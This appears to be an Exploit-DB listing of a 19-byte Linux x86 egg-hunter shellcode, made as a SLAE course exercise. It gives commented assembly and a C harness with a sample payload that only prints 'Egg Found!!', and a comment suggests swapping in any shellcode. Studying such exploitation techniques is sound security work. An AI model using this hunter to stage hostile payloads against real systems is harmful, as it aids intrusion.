Linux/x86 - Egghunter (0x50905090) Without Hardcoded Signature Shellcode (19 bytes)

EDB-ID:

37749

CVE:

N/A




Platform:

Linux_x86

Date:

2015-08-10


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

/*
Title: Linux x86 Egg Hunter Shellcode (19 bytes)
Date: 4 August 2015
Author: Guillaume Kaddouch
    Website: http://networkfilter.blogspot.com
    Twitter: @gkweb76
Tested on: Ubuntu 14.04.2 LTS x86, Kali Linux 1.0.9 x86

This code was created as an exercise for the SecurityTube Linux Assembly Expert (SLAE).

Egg signature = 0x50905090 (push eax, nop, push eax, nop)
Usually egg hunters use a 2 * 4 bytes (8 bytes) egg because the first address check could match the hardcoded egg signature in
the egg hunter itself. As we do not store hardcoded egg signature below, it allows us to check only 4 bytes once.

egg-hunter.asm:
----------------

global _start

section .text

_start:
        mov eax, addr                   ; retrieve a valid address (shorter than using JMP CALL POP)
        mov ebx, dword 0x5090508f       ; egg signature altered: 0x50905090 - 1
        inc ebx                         ; fix egg signature in ebx (the purpose is to not store the hardcoded egg signature)

next_addr:
        inc eax                         ; increasing memory address to look at next address
        cmp dword [eax], ebx            ; check if our egg is at that memory address, if yes set ZF = 1
        jne next_addr                   ; if ZF = 0 (check failed), then jump to next_addr to check next address
        jmp eax                         ; we found our egg (ZF = 1), jump at this address

        addr: db 0x1
*/

/*
myegg.c:
-----------
Compile with: gcc -fno-stack-protector -z execstack myegg.c -o myegg
*/

#include<stdio.h>
#include<string.h>

// Egg hunter 19 bytes (\x00 \x0a \x0d free)
unsigned char egghunter[] = \
"\xb8\x72\x80\x04\x08\xbb\x8f\x50\x90\x50\x43\x40\x39\x18\x75"
"\xfb\xff\xe0\x01";

// Print 'Egg Found!!' on screen
// You can swap it out with any shellcode you like (as long as you keep the egg mark)
unsigned char shellcode[] = \
"\x90\x50\x90\x50" // egg mark
"\xeb\x16\x59\x31\xc0\x50\xb0\x04\x31\xdb\xb3\x01\x31\xd2\xb2"
"\x0c\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff\x45"
"\x67\x67\x20\x46\x6f\x75\x6e\x64\x21\x21\x0a";

main()
{
        printf("Egg hunter shellcode Length:  %d\n", strlen(egghunter));
        int (*ret)() = (int(*)())egghunter;
        ret();
}